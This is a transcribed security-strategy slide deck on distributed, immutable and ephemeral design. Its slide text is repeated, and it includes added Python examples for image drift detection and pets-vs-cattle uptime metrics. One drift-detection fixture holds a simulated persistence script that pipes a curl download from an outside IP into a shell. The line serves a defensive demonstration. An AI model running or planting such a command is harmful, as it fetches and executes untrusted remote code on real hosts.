How To Solve Cybersecurity
New Paradigms for the Next Era of Security
Sounil Yu
@sounilyu
The Grand Challenge of Our Generation
@sounilyu 2
What should we focus on if we want to solve it within the next few years?
Solved State: Get Inside the Attacker OODA Loop?
@sounilyu 3
(Diagram: two loops side by side, the Defender OODA Loop and the Attacker OODA Loop, each cycling Observe -> Orient -> Decide -> Act)
Can defenders ever achieve the goal of responding faster than the attacker?
A Quick History of IT and Security
@sounilyu 4
(Table: one column per era, rows for Core Challenges, Solutions, Security Team Composition & Focus, and IT / Security Tension)
Era: 1980s
  Core Challenges: Asset Inventory, Asset Mgt, Asset Prioritization
  Solutions: Systems Mgt Tools, Scanners
  Security Team Composition & Focus: None
Era: 1990s
  Core Challenges: Viruses, Insecure Configs, Server-side Attacks
  Solutions: A/V, Firewalls, Secure Configs, App Sec
  Security Team Composition & Focus: Hobby Shop / Vulnerability Mgt
Era: 2000s
  Core Challenges: Client-side Attacks, Log Analysis and Mgt
  Solutions: IDS, SIEM
  Security Team Composition & Focus: Dedicated Biz Unit / Risk Mgt
Era: 2010s
  Core Challenges: Assume Breach, Too Many Privileges
  Solutions: Incident Response, Hunting, EDR, IdAM
  Security Team Composition & Focus: Sec Ops Center / Threat Mgt
IT / Security Tension: a spectrum running from STABILITY (CIO) at one end to SECURITY (CISO) at the other
Mapping to the NIST Cyber Security Framework
@sounilyu 5
(Table: the same era table as the previous slide, with each era labelled by the NIST CSF function it maps to; the function labels are the ones the deck spells out on slide 15)
Era: 1980s (NIST CSF function: Identify)
  Core Challenges: Asset Inventory, Asset Mgt, Asset Prioritization
  Solutions: Systems Mgt Tools, Scanners
  Security Team Composition & Focus: None
Era: 1990s (NIST CSF function: Protect)
  Core Challenges: Viruses, Insecure Configs, Server-side Attacks
  Solutions: A/V, Firewalls, Secure Configs, App Sec
  Security Team Composition & Focus: Hobby Shop / Vulnerability Mgt
Era: 2000s (NIST CSF function: Detect)
  Core Challenges: Client-side Attacks, Log Analysis and Mgt
  Solutions: IDS, SIEM
  Security Team Composition & Focus: Dedicated Biz Unit / Risk Mgt
Era: 2010s (NIST CSF function: Respond)
  Core Challenges: Assume Breach, Too Many Privileges
  Solutions: Incident Response, Hunting, EDR, IdAM
  Security Team Composition & Focus: Sec Ops Center / Threat Mgt
IT / Security Tension: a spectrum running from STABILITY (CIO) at one end to SECURITY (CISO) at the other
2020s: Age of Recovery (or Resiliency)
@sounilyu 6
What kind of attacks should we see in the 2020s that would challenge our ability to RECOVER or cause irreversible harm?
Confidentiality: Wikileaks, Doxxing
Integrity: Ransomware, #fakenews
Availability: PDoS, MBR Wiper, Bricking Firmware
2020s: Age of Recovery (or Resiliency)
@sounilyu 7
What kind of solutions directly support our ability to RECOVER or be RESILIENT?
Forging ahead or regressing back?
@sounilyu 8
(Slogan pictured on the slide: “JOIN THE PREVENTION AGE. STOP CYBER BREACHES”)
• A call to go back to the 1990s?
• How will prevention mitigate the impact of ransomware?
  - Remember, we learned “assume breach” in the 2010s
  - Prevention minimizes the occurrences, but does not address the impact or ability to recover
2020s: Age of Recovery (or Resiliency)
@sounilyu 9
What kind of solutions directly support our ability to RECOVER or be RESILIENT?
(Pictured: Copy on Write; a virtualization stack of Computer / Hypervisor / OS / Apps / Libraries; Serverless Architecture; Content Delivery Network)
But wait! How are these “security” solutions?
@sounilyu 10
Distributed: DDoS Resistant. The best solution against a distributed attack is a distributed service. (Maps to Availability)
Immutable: Changes Easier to Detect and Reverse. Unauthorized changes stand out and can be reverted to known good. (Maps to Integrity)
Ephemeral: Drives Value of Assets Closer to Zero. Makes attacker persistence hard and reduces concern for assets at risk. (Maps to Confidentiality)
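The immutable property above rests on one mechanical fact: if a host is only ever built from a known-good image, then any difference between the running host and that image is unauthorized by definition, so detection reduces to a manifest diff and recovery reduces to redeploying the image. The following is an added example, not code from the deck or from Sounil Yu; it assumes a host image is described by a manifest of path to SHA-256 hash, and the file contents and paths in it are constructed sample data.

```python
"""Drift detection and revert-to-known-good for an immutable host image.

Added example (not from the deck). Assumes a host is built from an image whose
contents can be summarised as a manifest: path -> sha256 hex digest.
"""
import hashlib
from typing import Dict, NamedTuple, Set


class Drift(NamedTuple):
    """Paths whose state differs from the known-good manifest."""
    added: Set[str]      # present on the host, absent from the image
    removed: Set[str]    # in the image, missing on the host
    modified: Set[str]   # present in both, content differs

    def is_clean(self) -> bool:
        return not (self.added or self.removed or self.modified)


def manifest(files: Dict[str, bytes]) -> Dict[str, str]:
    """Hash every file so the manifest is small, comparable and tamper-evident."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def detect_drift(known_good: Dict[str, str], observed: Dict[str, str]) -> Drift:
    """Compare two manifests. On an immutable host there is no legitimate
    in-place change, so the diff itself is the alert."""
    golden, current = set(known_good), set(observed)
    return Drift(
        added=current - golden,
        removed=golden - current,
        modified={p for p in golden & current if known_good[p] != observed[p]},
    )


def revert_to_known_good(image: Dict[str, bytes]) -> Dict[str, bytes]:
    """The 'fix' on immutable infrastructure: replace the host with a fresh copy
    of the image rather than repairing drifted files one by one."""
    return dict(image)


# Constructed sample image: three files a small web host might carry.
GOLDEN_IMAGE: Dict[str, bytes] = {
    "/etc/app/config.yaml": b"listen: 0.0.0.0:8443\ntls: required\n",
    "/usr/local/bin/app": b"constructed placeholder for an application binary",
    "/etc/cron.d/rotate-logs": b"0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
}


def run_check() -> Drift:
    """Simulate a host whose config was weakened and which gained an unexpected file."""
    running = dict(GOLDEN_IMAGE)
    running["/etc/app/config.yaml"] = b"listen: 0.0.0.0:8443\ntls: optional\n"   # altered in place
    running["/usr/local/bin/unexpected"] = b"constructed: not part of the image"  # not in the image
    return detect_drift(manifest(GOLDEN_IMAGE), manifest(running))


def run_revert() -> bool:
    """After redeploying the image, the host should compare clean again."""
    fresh = revert_to_known_good(GOLDEN_IMAGE)
    return detect_drift(manifest(GOLDEN_IMAGE), manifest(fresh)).is_clean()


if __name__ == "__main__":
    d = run_check()
    print("modified:", sorted(d.modified))
    print("added:", sorted(d.added))
    print("removed:", sorted(d.removed))
    print("clean after revert:", run_revert())
```

The design point is that the known-good manifest, not the host, is the source of truth: the detector never has to decide whether a change was authorized, and the responder never has to decide which files to repair.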
The Alternative:
An Endless Conveyor Belt of Vulnerabilities and Threats
@sounilyu 11
(Diagram: Never Ending Threats and Never Ending Vulns on a conveyor belt feeding Risk, where Risk = Likelihood x Impact)
Pets vs Cattle
@sounilyu 12
Pets:
• Given a familiar name
• Taken to the vet when sick
• Hugged
Cattle:
• Branded with an obscure, unpronounceable name
• Shot when sick
• Eaten/Recycled (sorry PETA)
A New Measurement for a New Era: Pets vs Cattle Curve
@sounilyu 13
(Chart: Uptime (in Days) on a log scale from 1 to 10000 against Systems from 0 to 20000, with the curve dividing Pets from Cattle. Two points are marked on the curve: 2000 systems at 10 days and 500 systems at 40 days.)
@40 Days -> Pets = 2.5%
@10 Days -> Pets = 10%
Target: @10 Days -> Pets = 2.5%
Find design patterns, policies, and incentives that push the curve in these directions: fewer pets and shorter-lived cattle
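The curve above is a metric a team can compute from its own asset inventory: sort systems by uptime, pick a threshold, and the share of systems above it is the "pets" fraction the slide quotes. The following is an added example, not code from the deck or from Sounil Yu. It reads the chart's annotations as: of a fleet of 20,000 systems, 2,000 have been up at least 10 days (10%) and 500 at least 40 days (2.5%), and the target is to bring the 10-day figure down to 2.5%. The Asset dataclass, its boot_time field and the host names are assumptions standing in for whatever a CMDB or EDR export provides; the 20,000-system inventory is constructed to match those annotations.

```python
"""Pets-vs-cattle curve computed from an asset inventory.

Added example (not from the deck). The Asset shape is an assumption; replace
constructed_inventory() with a real CMDB/EDR export in practice.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Sequence


@dataclass(frozen=True)
class Asset:
    name: str             # hypothetical field name
    boot_time: datetime   # hypothetical field name: last (re)build or boot time


def uptime_days(asset: Asset, now: datetime) -> float:
    """Uptime in days, the quantity the pets-vs-cattle curve is drawn on."""
    return (now - asset.boot_time).total_seconds() / 86400.0


def pets_fraction(uptimes: Sequence[float], threshold_days: float) -> float:
    """Share of systems alive at least threshold_days: those are the pets."""
    if not uptimes:
        return 0.0
    return sum(1 for u in uptimes if u >= threshold_days) / len(uptimes)


def pets_curve(uptimes: Sequence[float], thresholds: Iterable[float]) -> Dict[float, int]:
    """Number of systems still alive at each uptime threshold, i.e. the points
    of the curve that separates pets (long-lived) from cattle (short-lived)."""
    return {t: sum(1 for u in uptimes if u >= t) for t in thresholds}


def meets_target(uptimes: Sequence[float], threshold_days: float = 10.0,
                 max_pets_fraction: float = 0.025) -> bool:
    """The slide's target: at 10 days, no more than 2.5% of systems are pets."""
    return pets_fraction(uptimes, threshold_days) <= max_pets_fraction


def constructed_inventory(now: datetime) -> List[Asset]:
    """Constructed fleet of 20,000 systems shaped like the chart's annotations:
    500 up 40+ days, a further 1,500 up 10-39 days, the remaining 18,000 under 10 days."""
    assets = []
    for i in range(20_000):
        if i < 500:
            days = 40 + (i % 300)       # long-lived pets
        elif i < 2_000:
            days = 10 + (i % 30)        # 10..39 days
        else:
            days = 1 + (i % 9)          # 1..9 days: cattle
        assets.append(Asset(f"host-{i:05d}", now - timedelta(days=days)))
    return assets


def summarize(now: datetime = None) -> dict:
    """Compute the figures the slide quotes plus the curve points behind them."""
    now = now or datetime.now(timezone.utc)
    uptimes = [uptime_days(a, now) for a in constructed_inventory(now)]
    return {
        "pets_at_40_days": pets_fraction(uptimes, 40),   # 0.025
        "pets_at_10_days": pets_fraction(uptimes, 10),   # 0.10
        "meets_target": meets_target(uptimes),            # False: 10% > 2.5%
        "curve": pets_curve(uptimes, [1, 10, 40]),
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

Running the curve over real inventory exports at intervals is what turns the slide's "push the curve in these directions" into something measurable: the 10-day pets fraction is the number that should trend toward the target as rebuild pipelines and short-lived hosts replace long-lived ones.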
A Better Way to Get Inside the Attacker OODA Loop?
@sounilyu 14
(Diagram: four loops, each cycling Observe -> Orient -> Decide -> Act: the Defender OODA Loop, the Attacker OODA Loop, the Natural Business OODA Loop, and the Business OODA Loop w/ Traditional Security Restrictions)
Distributed, immutable, and ephemeral design patterns allow businesses to move faster and naturally shorten the OODA loop
(OODA(Business) – OODA(CIO+CISO) = Shadow IT)
“Larger swaths of risk are quickly being eliminated at newer companies, at earlier and earlier stages. And usually not because security was the goal.”
– Ryan McGeehan, https://medium.com/starting-up-security/you-dont-need-a-chief-security-officer-3f8d1a76b924
Completing the NIST Cyber Security Framework
@sounilyu 15
(Table: one column per era, now extended to the 2020s; rows for Core Challenges, Solutions, Security Team Composition & Focus, and IT / Security Tension)
Era: 1980 (NIST CSF function: Identify)
  Core Challenges: Asset Inventory, Asset Mgt, Asset Prioritization
  Solutions: Systems Mgt Tools, Scanners
  Security Team Composition & Focus: None
Era: 1990 (NIST CSF function: Protect)
  Core Challenges: Viruses, Insecure Configs, Server-side Attacks
  Solutions: A/V, Firewalls, Secure Configs, App Sec
  Security Team Composition & Focus: Hobby Shop / Vulnerability Mgt
Era: 2000 (NIST CSF function: Detect)
  Core Challenges: Client-side Attacks, Log Analysis and Mgt
  Solutions: IDS, SIEM
  Security Team Composition & Focus: Dedicated Biz Unit / Risk Mgt
Era: 2010 (NIST CSF function: Respond)
  Core Challenges: Assume Breach, Too Many Privileges
  Solutions: Incident Response, Hunting, EDR, IdAM
  Security Team Composition & Focus: Sec Ops Center / Threat Mgt
Era: 2020 (NIST CSF function: Recover)
  Core Challenges: Ransomware, MBR Wiper, DDoS, Firmware Bricking
  Solutions: Distributed, Immutable, Ephemeral (DIE!!!) Systems
  Security Team Composition & Focus: Integrated Team / Rugged DevOps
IT / Security Tension: a spectrum running from STABILITY (CIO) at one end to SECURITY (CISO) at the other
Summary
@sounilyu 16
• Known attack methods only get better with time against static systems
• The next era in IT and Security will manifest more irreversible attacks that challenge and undermine our ability to RECOVER
• Better PROTECT, DETECT, and RESPOND capabilities may reduce occurrences of malicious events but are insufficient against well-executed destructive/irreversible scenarios
• Our best countermeasure is resilient design patterns that promote the qualities of distributed, immutable, and ephemeral (DIE!) in lieu of confidentiality, integrity, and availability
• Elimination of poor designs will happen either by intentional decommissioning or by destruction. Which would you rather count on?
Solving Cybersecurity Through Cyber Train Crashes
@sounilyu 17

(Published on SlideShare under the title: Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security)

  • 1. How To Solve Cybersecurity New Paradigms for the Next Era of Security Sounil Yu @sounilyu
  • 2. The Grand Challenge of Our Generation @sounilyu 2 What should we focus on if we want to solve it within the next few years?
  • 3. Solved State: Get Inside the Attacker OODA Loop? @sounilyu 3 Orient DecideAct Observe Defender OODA Loop Attacker OODA LoopObserve OrientDecide Act Can defenders ever achieve the goal of responding faster than the attacker?
  • 4. A Quick History of IT and Security
       Era:                               1980s | 1990s | 2000s | 2010s
       Core Challenges:                   Asset Inventory, Asset Mgt, Asset Prioritization | Viruses, Insecure Configs, Server-side Attacks | Client-side Attacks, Log Analysis and Mgt | Assume Breach, Too Many Privileges
       Solutions:                         Systems Mgt Tools, Scanners | A/V, Firewalls, Secure Configs, App Sec | IDS, SIEM | Incident Response, Hunting, EDR, IdAM
       Security Team Composition & Focus: None | Hobby Shop / Vulnerability Mgt | Dedicated Biz Unit / Risk Mgt | Sec Ops Center / Threat Mgt
       IT / Security Tension:             STABILITY (CIO) vs. SECURITY (CISO)
  • 5. Mapping to the NIST Cyber Security Framework: the same table as slide 4, with each era's focus mapped to a NIST CSF function (1980s Identify, 1990s Protect, 2000s Detect, 2010s Respond); slide 15 completes the mapping with 2020s Recover.
  • 6. 2020s: Age of Recovery (or Resiliency). What kind of attacks should we see in the 2020s that would challenge our ability to RECOVER or cause irreversible harm? Confidentiality: Wikileaks, Doxxing. Integrity: Ransomware, #fakenews. Availability: PDoS, MBR Wiper, Bricking Firmware.
  • 7. 2020s: Age of Recovery (or Resiliency). What kind of solutions directly support our ability to RECOVER or be RESILIENT?
  • 8. Forging ahead or regressing back? (Banner: "JOIN THE PREVENTION AGE. STOP CYBER BREACHES.") • A call to go back to the 1990s? • How will prevention mitigate the impact of ransomware? Remember, we learned "assume breach" in the 2010s. Prevention minimizes the occurrences, but does not address the impact or the ability to recover.
  • 9. 2020s: Age of Recovery (or Resiliency). What kind of solutions directly support our ability to RECOVER or be RESILIENT? Examples shown: Copy on Write; Serverless Architecture (illustrated as a stack of Computer, Hypervisor, OS, Libraries and Apps); Content Delivery Network.
  • 10. But wait! How are these "security" solutions? • Distributed (supports Availability): DDoS Resistant. The best solution against a distributed attack is a distributed service. • Immutable (supports Integrity): Changes Easier to Detect and Reverse. Unauthorized changes stand out and can be reverted to known good. • Ephemeral (supports Confidentiality): Drives Value of Assets Closer to Zero. Makes attacker persistence hard and reduces concern for assets at risk.
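The "Immutable" point on slide 10 is the one a practitioner can turn into a control directly: if a host is built from an immutable image, any difference between the running files and the build-time manifest is unauthorized by definition, so detection needs no allow-list of "legitimate" changes and remediation is simply a rebuild from the golden image. The following is an added example, not code from the deck or from Sounil Yu; the image paths, file contents and the drifted state are constructed and hypothetical.

```python
"""Drift detection against an immutable image's known-good manifest.

Added example, not from the slides: hash every file of a deployed host,
compare with the manifest captured at build time, report what was added,
modified or removed, and rebuild the known-good state. The golden image
and the running state below are constructed for illustration.
"""
import hashlib
import os
from typing import Dict, List, Tuple

# Constructed golden image: what the build pipeline produced and signed off on.
GOLDEN_IMAGE: Dict[str, bytes] = {
    "/etc/nginx/nginx.conf": b"worker_processes 2;\n",
    "/etc/ssh/sshd_config": b"PasswordAuthentication no\n",
    "/usr/local/bin/app": b"\x7fELF placeholder for the application binary",
}

# Constructed running state: password auth was turned back on and a
# persistence script was dropped; the application binary is untouched.
RUNNING_STATE: Dict[str, bytes] = {
    "/etc/nginx/nginx.conf": b"worker_processes 2;\n",
    "/etc/ssh/sshd_config": b"PasswordAuthentication yes\n",
    "/usr/local/bin/app": b"\x7fELF placeholder for the application binary",
    "/tmp/.persist.sh": b"#!/bin/sh\ncurl -s http://198.51.100.7/x | sh\n",
}


def build_manifest(files: Dict[str, bytes]) -> Dict[str, str]:
    """Map each path to the SHA-256 hex digest of its content."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def manifest_from_directory(root: str) -> Dict[str, str]:
    """Same as build_manifest, but walks a real directory tree (keys relative to root)."""
    manifest: Dict[str, str] = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def detect_drift(manifest: Dict[str, str], running: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Return added, modified and removed paths relative to the known-good manifest.

    On an immutable host every entry reported here is unauthorized by definition:
    there is no legitimate in-place change to distinguish from a malicious one.
    """
    current = build_manifest(running)
    return {
        "added": sorted(p for p in current if p not in manifest),
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "removed": sorted(p for p in manifest if p not in current),
    }


def revert_to_known_good(golden: Dict[str, bytes],
                         running: Dict[str, bytes]) -> Tuple[Dict[str, bytes], List[Tuple[str, str]]]:
    """Rebuild the running state from the golden image and list the actions taken.

    Modified files are overwritten, added files deleted, removed files restored.
    Nothing from the drifted state survives; that is what 'immutable' buys us.
    """
    actions: List[Tuple[str, str]] = []
    for path in sorted(set(golden) | set(running)):
        if path not in golden:
            actions.append(("delete", path))
        elif path not in running:
            actions.append(("restore", path))
        elif running[path] != golden[path]:
            actions.append(("overwrite", path))
    return dict(golden), actions


if __name__ == "__main__":
    manifest = build_manifest(GOLDEN_IMAGE)
    for kind, paths in detect_drift(manifest, RUNNING_STATE).items():
        for p in paths:
            print(f"{kind:9s} {p}")
    restored, actions = revert_to_known_good(GOLDEN_IMAGE, RUNNING_STATE)
    print("remediation:", actions)
    print("clean after rebuild:", detect_drift(manifest, restored) == {"added": [], "modified": [], "removed": []})
```

For a real host, `manifest_from_directory` produces the same kind of manifest from a mounted root; the manifest itself should be stored outside the host (or signed at build time), since a manifest an attacker can edit proves nothing. In the ephemeral version of the same design the "revert" step is not even a file copy: the instance is terminated and a fresh one is launched from the image.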
  • 11. The Alternative: An Endless Conveyor Belt of Vulnerabilities and Threats. Risk = Likelihood × Impact, fed by never-ending threats and never-ending vulns.
  • 12. Pets vs Cattle. Pets: given a familiar name; taken to the vet when sick; hugged. Cattle: branded with an obscure, unpronounceable name; shot when sick; eaten/recycled (sorry PETA).
  • 13. A New Measurement for a New Era: Pets vs Cattle Curve. (Chart: number of systems, 0 to 20,000, against uptime in days on a log scale from 1 to 10,000; systems past the uptime threshold are pets, the rest cattle. Data points: 2,000 systems past 10 days, so @10 Days → Pets = 10%; 500 systems past 40 days, so @40 Days → Pets = 2.5%. Target: @10 Days → Pets = 2.5%.) Find design patterns, policies, and incentives that push the curve in these directions: fewer pets, shorter-lived cattle.
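The curve on slide 13 is easy to compute from any inventory that records uptime: the pets share at a threshold is simply the fraction of systems alive at least that long, and the target is a ceiling on that share. The following is an added example, not code from the deck or from Sounil Yu; the CSV inventory is constructed, and the synthetic 20,000-system fleet is built so that it reproduces the slide's two data points (2,000 systems past 10 days = 10%, 500 past 40 days = 2.5%).

```python
"""Pets-vs-cattle curve as a fleet metric.

Added example, not from the slides: compute the share of systems past an
uptime threshold (pets), list the pets that need rebuilding or
decommissioning, plot the curve as (threshold, share) points, and check
the fleet against a target. Inventory data below is constructed.
"""
import csv
import io
from typing import Dict, List, Tuple

# Constructed inventory export: one line per host with its uptime in days.
SAMPLE_INVENTORY = """hostname,uptime_days
web-a1f3,3
web-b77e,7
api-0c21,12
db-legacy-01,412
jump-host,95
batch-e9d0,1
cache-52aa,9
mail-old,230
"""


def parse_inventory(text: str) -> Dict[str, int]:
    """Parse a hostname,uptime_days CSV export into a mapping."""
    reader = csv.DictReader(io.StringIO(text))
    return {row["hostname"]: int(row["uptime_days"]) for row in reader}


def pets_ratio(uptimes: Dict[str, int], threshold_days: int) -> float:
    """Fraction of systems alive at least threshold_days: the pets share on the curve."""
    if not uptimes:
        return 0.0
    return sum(1 for d in uptimes.values() if d >= threshold_days) / len(uptimes)


def list_pets(uptimes: Dict[str, int], threshold_days: int) -> List[str]:
    """Hosts at or past the threshold, longest-lived first: the ones to rebuild or retire."""
    pets = [h for h, d in uptimes.items() if d >= threshold_days]
    return sorted(pets, key=lambda h: (-uptimes[h], h))


def survival_curve(uptimes: Dict[str, int], thresholds: List[int]) -> List[Tuple[int, float]]:
    """Points of the slide's curve: (uptime threshold, share of systems still alive past it)."""
    return [(t, pets_ratio(uptimes, t)) for t in thresholds]


def meets_target(uptimes: Dict[str, int], threshold_days: int, target_ratio: float) -> bool:
    """True when the pets share at the threshold is within the target (e.g. 2.5% at 10 days)."""
    return pets_ratio(uptimes, threshold_days) <= target_ratio


def slide_fleet() -> Dict[str, int]:
    """Constructed 20,000-system fleet whose curve matches the slide's data points."""
    fleet: Dict[str, int] = {}
    for i in range(18000):            # short-lived cattle, 1 to 9 days
        fleet[f"cattle-{i:05d}"] = 1 + i % 9
    for i in range(1500):             # medium-lived, 10 to 39 days
        fleet[f"mid-{i:04d}"] = 10 + i % 30
    for i in range(500):              # long-lived pets, 40 days and up
        fleet[f"pet-{i:03d}"] = 40 + i
    return fleet


if __name__ == "__main__":
    fleet = slide_fleet()
    for days, share in survival_curve(fleet, [1, 10, 40, 100, 1000]):
        print(f"@{days:>4} days -> pets = {share:.1%}")
    print("target met (2.5% at 10 days):", meets_target(fleet, 10, 0.025))
    inv = parse_inventory(SAMPLE_INVENTORY)
    print("pets at 40 days in sample inventory:", list_pets(inv, 40))
```

Run against the synthetic fleet this prints 10.0% at 10 days and 2.5% at 40 days, and reports the 2.5%-at-10-days target as not met, which is exactly the gap the slide asks design patterns and incentives to close. The `list_pets` output is the actionable half of the metric: the hosts with the longest uptime are the ones whose design keeps them from being rebuilt.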
  • 14. A Better Way to Get Inside the Attacker OODA Loop? (Figure: the Defender OODA Loop, the Attacker OODA Loop, the Natural Business OODA Loop and the Business OODA Loop with Traditional Security Restrictions, each cycling Observe, Orient, Decide, Act.) Distributed, immutable, and ephemeral design patterns allow businesses to move faster and naturally shorten the OODA loop (OODA_Business − OODA_CIO+CISO = Shadow IT). "Larger swaths of risk are quickly being eliminated at newer companies, at earlier and earlier stages. And usually not because security was the goal." (Ryan McGeehan, https://medium.com/starting-up-security/you-dont-need-a-chief-security-officer-3f8d1a76b924)
  • 15. Completing the NIST Cyber Security Framework
       Era / NIST CSF Function:           1980 Identify | 1990 Protect | 2000 Detect | 2010 Respond | 2020 Recover
       Core Challenges:                   Asset Inventory, Asset Mgt, Asset Prioritization | Viruses, Insecure Configs, Server-side Attacks | Client-side Attacks, Log Analysis and Mgt | Assume Breach, Too Many Privileges | Ransomware, MBR Wiper, DDoS, Firmware Bricking
       Solutions:                         Systems Mgt Tools, Scanners | A/V, Firewalls, Secure Configs, App Sec | IDS, SIEM | Incident Response, Hunting, EDR, IdAM | Distributed, Immutable, Ephemeral (DIE!!!) Systems
       Security Team Composition & Focus: None | Hobby Shop / Vulnerability Mgt | Dedicated Biz Unit / Risk Mgt | Sec Ops Center / Threat Mgt | Integrated Team / Rugged DevOps
       IT / Security Tension:             STABILITY (CIO) vs. SECURITY (CISO)
  • 16. Summary • Known attack methods only get better with time against static systems • The next era in IT and Security will manifest more irreversible attacks that challenge and undermine our ability to RECOVER • Better PROTECT, DETECT, and RESPOND capabilities may reduce occurrences of malicious events but are insufficient against well-executed destructive/irreversible scenarios • Our best countermeasure is resilient design patterns that promote the qualities of distributed, immutable, and ephemeral (DIE!) in lieu of confidentiality, integrity, and availability
  • 17. Solving Cybersecurity Through Cyber Train Crashes • Elimination of poor designs will happen either by intentional decommissioning or by destruction. Which would you rather count on?